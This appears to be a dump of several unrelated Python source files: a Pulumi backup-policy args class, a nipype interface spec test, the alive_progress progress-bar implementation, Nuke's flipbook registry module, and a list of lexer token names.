if time_zone is not None:
pulumi.set(__self__, "time_zone", time_zone)
@property
@pulumi.getter(name="instantRpRetentionRangeInDays")
def instant_rp_retention_range_in_days(self) -> Optional[pulumi.Input[int]]:
"""
Instant RP retention policy range in days
"""
return pulumi.get(self, "instant_rp_retention_range_in_days")
@instant_rp_retention_range_in_days.setter
def instant_rp_retention_range_in_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instant_rp_retention_range_in_days", value)
@property
@pulumi.getter(name="retentionPolicy")
def retention_policy(self) -> Optional[pulumi.Input[str]]:
"""
Retention policy with the details on backup copy retention ranges.
"""
return pulumi.get(self, "retention_policy")
@retention_policy.setter
def retention_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "retention_policy", value)
@property
@pulumi.getter(name="schedulePolicy")
def schedule_policy(self) -> Optional[pulumi.Input[str]]:
"""
Backup schedule specified as part of backup policy.
"""
return pulumi.get(self, "schedule_policy")
@schedule_policy.setter
def schedule_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schedule_policy", value)
@property
@pulumi.getter(name="timeZone")
def time_zone(self) -> Optional[pulumi.Input[str]]:
"""
TimeZone optional input as string. For example: Pacific Standard Time
"""
return pulumi.get(self, "time_zone")
@time_zone.setter
def time_zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_zone", value)
|
py | 1a4a2b151700b8376c71a0a00e4049e1df17343e | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..icc import ICC
def test_ICC_inputs():
input_map = dict(
mask=dict(mandatory=True, ),
subjects_sessions=dict(mandatory=True, ),
)
inputs = ICC.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_ICC_outputs():
output_map = dict(
icc_map=dict(),
session_var_map=dict(),
subject_var_map=dict(),
)
outputs = ICC.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
|
py | 1a4a2cd24bb0ee3a84161f2c11f08add30edc310 | # coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import math
import sys
import threading
import time
from contextlib import contextmanager
from datetime import timedelta
from itertools import chain, islice, repeat
from .animations.utils import spinner_player
from .configuration import config_handler
@contextmanager
def alive_bar(total=None, title=None, calibrate=None, **options):
"""An alive progress bar to keep track of lengthy operations.
It has a spinner indicator, time elapsed, throughput and eta.
When the operation finishes, a receipt is displayed with statistics.
If the code was being executed in a headless environment, ie without a
connected tty, all features of the alive progress bar will be disabled
but the final receipt.
Another cool feature is that it tracks the actual count in regard of the
expected count. It will look different if you send more (or less) than
expected.
Also, the bar installs a hook in the system print function, which cleans
any garbage mix-up of texts, allowing you to print() while using the bar.
And finally, it also do not show anything like `eta: 1584s`, it will nicely
show `eta: 0:26:24` as you would expect (but anything less than a minute
is indeed `eta: 42s`). :)
Use it like this:
>>> from alive_progress import alive_bar
... with alive_bar(<total>) as bar:
... for item in <iterable>:
... # process item
... bar() # makes the bar go forward
The `bar()` call is what makes the bar go forward. You can call it always,
or you can choose when to call it, depending on what you want to monitor.
While in a progress bar context, you have two ways to output messages:
- call `bar('text')`, which besides incrementing the counter, also
sets/overwrites an inline message within the bar;
- call `print('text')`, which prints an enriched message that includes
the current position of the progress bar, effectively leaving behind a
log and continuing the progress bar below it.
Both methods always clear the line appropriately to remove any garbage of
previous messages on screen.
If the bar is over or underused, it will warn you!
To test all supported scenarios, you can do this:
>>> for x in 1000, 1500, 700, 0:
... with alive_bar(x) as bar:
... for i in range(1000):
... time.sleep(.005)
... bar()
Expected results are these (but you have to see them in motion!):
[========================================] 3000/3000 [100%] in 7.4s (408.09/s)
[==============================! ] (!) 3000/4000 [75%] in 7.3s (408.90/s)
[========================================x (!) 3000/2000 [150%] in 7.4s (408.11/s)
[========================================] 3000 in 7.4s (407.54/s)
Args:
total (Optional[int]): the total expected count
title (Optional[str]): the title, will be printed whenever there's no custom message
calibrate (int): maximum theoretical throughput to calibrate animation speed
(cannot be in the global configuration because it depends on the current mode)
**options: custom configuration options, which override the global configuration:
length (int): number of characters to render the animated progress bar
spinner (Union[str | object]): spinner name in alive_progress.SPINNERS or custom
bar (Union[str | object]): bar name in alive_progress.BARS or custom
unknown (Union[str | object]): spinner name in alive_progress.SPINNERS or custom
theme (str): theme name in alive_progress.THEMES
force_tty (bool): runs animations even without a tty (pycharm terminal for example)
manual (bool): set to manually control percentage
"""
if total is not None:
if not isinstance(total, int):
raise TypeError("integer argument expected, got '{}'.".format(type(total).__name__))
if total <= 0:
total = None
config = config_handler(**options)
def to_elapsed():
return timedelta(seconds=int(run.elapsed)) if run.elapsed >= 60 else \
'{:.1f}s'.format(run.elapsed) if end else '{}s'.format(int(run.elapsed))
def clear_traces():
sys.__stdout__.write('\033[2K\r')
def run():
player = spinner_player(config.spinner())
while thread:
event.wait()
alive_repr(next(player))
time.sleep(1. / fps())
def alive_repr(spin=''):
update_data()
line = '{} {}{}{} in {} {} {}'.format(
bar_repr(run.percent, end), spin, spin and ' ' or '',
monitor(), to_elapsed(), run.stats(), run.text or title or ''
)
line_len = len(line)
with print_lock:
if line_len < run.last_line_len:
clear_traces()
sys.__stdout__.write(line + (spin and '\r' or '\n'))
sys.__stdout__.flush()
run.last_line_len = line_len
def flush_buffer():
if print_buffer:
print()
def sanitize_text(text):
return ' '.join(str(text).splitlines())
if config.manual:
def bar(perc=None, text=None):
if perc is not None:
flush_buffer()
run.percent = float(perc)
if text is not None:
run.text = sanitize_text(text)
return run.percent
else:
def bar(text=None, incr=1):
if incr > 0:
flush_buffer()
run.count += int(incr)
if text is not None:
run.text = sanitize_text(text)
return run.count
def print_hook(part):
if part != '\n':
# this will generate a sequence of lines interspersed with None, which will later
# be rendered as the indent filler to align additional lines under the same header.
gen = chain.from_iterable(zip(repeat(None), part.splitlines(True)))
print_buffer.extend(islice(gen, 1, None))
else:
header = header_template.format(run.count)
nested = ''.join(line or ' ' * len(header) for line in print_buffer)
with print_lock:
clear_traces()
sys.__stdout__.write('{}{}\n'.format(header, nested))
print_buffer[:] = []
print_buffer, print_lock = [], threading.Lock()
header_template = 'on {}: ' if config.enrich_print else ''
print_hook.write = print_hook
print_hook.flush = lambda: None
print_hook.isatty = sys.__stdout__.isatty
def start_monitoring(offset=0.):
sys.stdout = print_hook
event.set()
run.init = time.time() - offset
def stop_monitoring(clear):
if clear:
event.clear()
sys.stdout = sys.__stdout__
return time.time() - run.init
thread, event = None, threading.Event()
if sys.stdout.isatty() or config.force_tty:
@contextmanager
def pause_monitoring():
offset = stop_monitoring(True)
alive_repr()
yield
start_monitoring(offset)
bar.pause = pause_monitoring
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
def update_data():
update_hook()
run.elapsed = time.time() - run.init
run.rate = current() / run.elapsed if run.elapsed else 0.
run.eta_text = eta_text()
if total or config.manual: # we can track progress and therefore eta.
def eta_text():
if run.rate:
eta = (logic_total - current()) / run.rate
if eta >= 0:
return '{:.0f}s'.format(eta) if eta < 60 \
else timedelta(seconds=math.ceil(eta))
return '?'
bar_repr = config.bar(config.length)
stats = lambda: '({:.1{}}/s, eta: {})'.format(run.rate, format_spec, run.eta_text) # noqa
else: # unknown progress.
eta_text = lambda: None # noqa
bar_repr = config.unknown(config.length, config.bar)
stats = lambda: '({:.1f}/s)'.format(run.rate) # noqa
stats_end = lambda: '({:.2{}}/s)'.format(run.rate, format_spec) # noqa
if total or not config.manual: # we can count items.
logic_total, format_spec, factor, current = total, 'f', 1.e6, lambda: run.count # noqa
else: # there's only a manual percentage.
logic_total, format_spec, factor, current = 1., '%', 1., lambda: run.percent # noqa
# calibration of the dynamic fps engine.
# I've started with the equation y = log10(x + m) * k + n, where:
# y is the desired fps, m and n are horizontal and vertical translation,
# k is a calibration factor, computed from some user input c (see readme for details).
# considering minfps and maxfps as given constants, I came to:
# fps = log10(x + 1) * k + minfps, which must be equal to maxfps for x = c,
# so the factor k = (maxfps - minfps) / log10(c + 1), and
# fps = log10(x + 1) * (maxfps - minfps) / log10(c + 1) + minfps
# neat! ;)
min_fps, max_fps = 2., 60.
calibrate = max(0., calibrate or factor)
adjust_log_curve = 100. / min(calibrate, 100.) # adjust curve for small numbers
factor = (max_fps - min_fps) / math.log10((calibrate * adjust_log_curve) + 1.)
def fps():
if run.rate <= 0:
return 10. # bootstrap speed
if run.rate < calibrate:
return math.log10((run.rate * adjust_log_curve) + 1.) * factor + min_fps
return max_fps
end, run.text, run.eta_text, run.stats = False, '', '', stats
run.count, run.last_line_len = 0, 0
run.percent, run.rate, run.init, run.elapsed = 0., 0., 0., 0.
if total:
if config.manual:
def update_hook():
run.count = int(math.ceil(run.percent * total))
else:
def update_hook():
run.percent = run.count / total
monitor = lambda: '{}{}/{} [{:.0%}]'.format( # noqa
'(!) ' if end and run.count != total else '', run.count, total, run.percent
)
elif config.manual:
update_hook = lambda: None # noqa
monitor = lambda: '{}{:.0%}'.format( # noqa
'(!) ' if end and run.percent != 1. else '', run.percent
)
else:
run.percent = 1.
update_hook = lambda: None # noqa
monitor = lambda: '{}'.format(run.count) # noqa
start_monitoring()
try:
yield bar
finally:
flush_buffer()
stop_monitoring(False)
if thread:
local_copy = thread
thread = None # lets the internal thread terminate gracefully.
local_copy.join()
end, run.text, run.stats = True, '', stats_end
alive_repr()
|
py | 1a4a2defad0b6ddb9d2b4adf5528d2fa9c059a84 | # Copyright (c) 2010 The Foundry Visionmongers Ltd. All Rights Reserved.
###############################################################################
import nuke
class FlipbookApplication(object):
"""An interface, for so far as Python supports it. To add support for a
flipbook this needs to be subclassed and the 3 methods implemented. The
default implementation just raises an exception so any sub implementer
will soon find out whether his implementation works."""
def __init__(self):
return
def name(self):
""" Return the name of the flipbook.
@return: String"""
raise NotImplementedError
def path(self):
"""Return the executable path required to run a flipbook.
@return: String"""
raise NotImplementedError
def cacheDir(self):
"""Return the preferred directory for rendering.
@return: String"""
raise NotImplementedError
def runFromNode(self, nodeToFlipbook, frameRanges, views, options):
"""Execute the flipbook on a node.
This method will use the node's filename to call run()
@param node: The node to run the flipbook
@param frameRanges: A FrameRanges object representing the range that should be flipbooked. Note that in 6.2v1-2 this was a FrameRange object.
@param views: A list of strings comprising of the views to flipbook. Willnot be more than the maximum supported by the flipbook.
@param options: A dictionary of options to use. This may contain the keys pixelAspect, roi, dimensions, audio and lut. These contain a float, a dict with bounding box dimensions, a dict with width and height, a path to audio file and a string indicating the LUT conversion to apply.
@return: None"""
filename = nuke.filename(nodeToFlipbook)
if filename is None or filename == "":
raise RuntimeError("Cannot run a flipbook on '%s', expected to find a filename and there was none." % (nodeToFlipbook.fullName(),))
self.run( filename, frameRanges, views, options)
def run(self, path, frameRanges, views, options):
"""Execute the flipbook on a path.
@param path: The path to run the flipbook on. This will be similar to /path/to/foo%03d.exr
@param frameRanges: A FrameRanges object representing the range that should be flipbooked. Note that in 6.2v1-2 this was a FrameRange object.
@param views: A list of strings comprising of the views to flipbook. Willnot be more than the maximum supported by the flipbook.
@param options: A dictionary of options to use. This may contain the keys pixelAspect, roi, dimensions, audio and lut. These contain a float, a dict with bounding box dimensions, a dict with width and height, a path to audio file and a string indicating the LUT conversion to apply.
@return: None"""
raise NotImplementedError
def capabilities(self):
"""Return the capabilities of the flipbook application in a dict. Currently used are:
canPreLaunch: bool, whether the flipbook can display a frames that are still being rendered by Nuke.
maximumViews: int, the number of views supported by this flipbook, should be 1 or higher.
fileTypes: list, the extensions of the file types supported by this format. Must all be lowercase, e.g ["exr", "jpg", ...].
A wildcard ["*"] can also be used to indicate support for any file type Nuke supports
"roi: bool, whether the flipbook supports region-of-interest
@return: dict with the capabilities above."""
raise NotImplementedError
def dialogKnobs(self, dialog):
"""This is called when the user has selected this flipbook application, and will be interested in any knobs that you might have to show for custom settings.
@param dialog: The FlipbookDialog that has requested the knobs to be added to it, e.g. dialog.addKnob(...)
@return: None"""
raise NotImplementedError
def dialogKnobChanged(self, dialog, knob):
"""Called whenever this flipbook is selected and one of the knobs added in dialogKnobs was changed.
@param dialog: The FlipbookDialog that contains the knob
@param knob: The knob added in dialogKnobs that was modified.
@return: None"""
raise NotImplementedError
def getExtraOptions(self, flipbookDialog, nodeToFlipbook):
"""Called whenever this flipbook is selected to retrieve extra options from the node selected to flipbook
and the flipbook dialog.
@param flipbookDialog: the flipbook dialog
@param nodeToFlipbook: node selected to flipbook
@return: a dictionary with the extra options """
return dict()
class FlipbookFactory(object):
def __init__(self):
self._flipbookApplications = {}
def isRegistered(self, flipbook):
""" Return whether a flipbook app with that name has already been registered.
@param flipbook: FlipBookApplication object that's tested for.
@return: bool"""
return flipbook.name() in self._flipbookApplications
def register(self, flipbookApplication):
"""Register a flipbook app. It will fail if the flipbook app name isn't unique.
@param flipbook: FlipBookApplication object to register
@return: None"""
if not self.isRegistered(flipbookApplication):
nuke.registerFlipbook(flipbookApplication.name())
self._flipbookApplications[flipbookApplication.name()] = flipbookApplication
else:
raise RuntimeError("Already registered a flipbook application with this name")
def getNames(self):
"""Returns a list of the names of all available flipbook apps.
@return: list"""
return sorted(self._flipbookApplications.keys())
def getApplication(self, name):
"""Returns the flipbook app implementation with the given name, raises an exception if none could be found.
@param name: The name of a flipbook that was registered.
@return: FlipBookApplication"""
if name in self._flipbookApplications:
return self._flipbookApplications[name]
else:
raise RuntimeError("Requested flipbook not registered")
class FlipbookLUTPathRegistry(object):
"""A registery of all LUT files against LUTs for each specific flipbook."""
def __init__(self):
self._luts = {}
def registerLUTPathForFlipbook(self, flipbook, lut, path):
"""Register the given LUT file.
@param flipbook: The unique name of the flipbook
@param lut: The unique name for the LUT, e.g. 'sRGB' and 'rec709'
@param path: Location of the flipbook specific file."""
if flipbook not in self._luts:
self._luts[flipbook] = {}
self._luts[flipbook][lut] = path
def getLUTPathForFlipbook(self, flipbook, lut):
"""Return the path for the given flipbook and lut. May return an empty string if none registered.
@param flipbook: The unique name of the flipbook
@param lut: The unique name for the LUT, e.g. 'sRGB' and 'rec709'"""
return self._luts.get(flipbook, {}).get(lut, "")
# Global registry of flipbooks.
gFlipbookFactory = FlipbookFactory()
# Global registry of user specified LUTs
gFlipbookLUTPathRegistry = FlipbookLUTPathRegistry()
# Convenience functions that make access to the globals a few key strokes less.
def register(flipbookApplication):
"""Register a flipbook. Convenience function that simple calls register() on the FlipbookFactory."""
gFlipbookFactory.register(flipbookApplication)
def registerLUTPath(flipbookApplication, lut, path):
"""Register a LUT for a specific flipbook. The path should refer to a file that contains the LUT for the given flipbook identified by the name in flipbookApplication. It is up to the flipbook subimplementation to actually use this file and the format may vary.
@param flipbook: The unique name of the flipbook
@param lut: The unique name for the LUT, e.g. 'sRGB' and 'rec709'
@param path: Location of the flipbook specific file."""
gFlipbookLUTPathRegistry.registerLUTPathForFlipbook(flipbookApplication, lut, path)
def getLUTPath(flipbookAppliction, lut):
"""Returns a path to a LUT file for the given flipbook. The contents of the file will be different for each flipbook application. Please see the relevant documentation for the specific flipbook applications.
@param flipbook: The unique name of the flipbook
@param lut: The unique name for the LUT, e.g. 'sRGB' and 'rec709'"""
return gFlipbookLUTPathRegistry.getLUTPathForFlipbook(flipbookAppliction, lut)
|
py | 1a4a31d147db3001df0688c85c84bc0bfb67110c | SPACE = 'space'
COMMENT = 'comment'
PLUS_ASSIGN = 'plus_assign'
PLUS = 'plus'
MOD_ASSIGN = 'mod_assign'
MOD = 'mod'
DIVISION_ASSIGN = 'div_assign'
DIVISION = 'div'
POW = 'pow'
MULT_ASSIGN = 'mult_assign'
MULT = 'mult'
NOT = 'not'
AND = 'and'
OR = 'or'
XOR = 'xor'
GREATER_EQUAL = 'greater_eq'
GREATER = 'greater'
LESS_EQUAL = 'less_eq'
LESS = 'less'
EQUAL = 'eq'
ASSIGN = 'assign'
NOT_EQUAL = 'not_eq'
BRACKET_OPEN = 'bracket_open'
BRACKET_CLOSE = 'bracket_close'
CURLY_BRACKET_OPEN = 'curly_bracket_open'
CURLY_BRACKET_CLOSE = 'curly_bracket_close'
SEMICOLON = 'semicolon'
CONCAT = 'concat'
ADD = 'add'
IF = 'if'
ELSE = 'else'
WHILE ='while'
PRINT = 'print'
INPUT = 'input'
BOOL = 'bool'
STRING = 'string'
MINUS_ASSIGN = 'minus_assign'
FLOAT = 'float'
INT = 'int'
MINUS = 'minus'
VARIABLE = 'var'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.